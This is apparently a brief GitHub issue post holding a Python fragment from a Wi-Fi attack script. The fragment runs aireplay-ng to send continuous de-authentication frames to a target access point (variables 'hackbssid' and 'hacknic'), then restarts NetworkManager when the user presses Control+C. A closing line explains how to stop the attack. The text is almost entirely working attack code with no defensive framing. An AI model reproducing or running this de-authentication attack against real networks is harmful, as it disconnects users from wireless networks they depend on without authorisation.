Open 201580ag opened 1 year ago
try:
subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, hacknic])
except KeyboardInterrupt:
print("Done!")
print("Stop authentication requests and end the monitor mode.")
subprocess.run(["sudo", "systemctl", "start", "NetworkManager.service"])
print("Done!")
Press Control+C during a de-authentication attack to exit monitor mode and enable Wi-Fi again.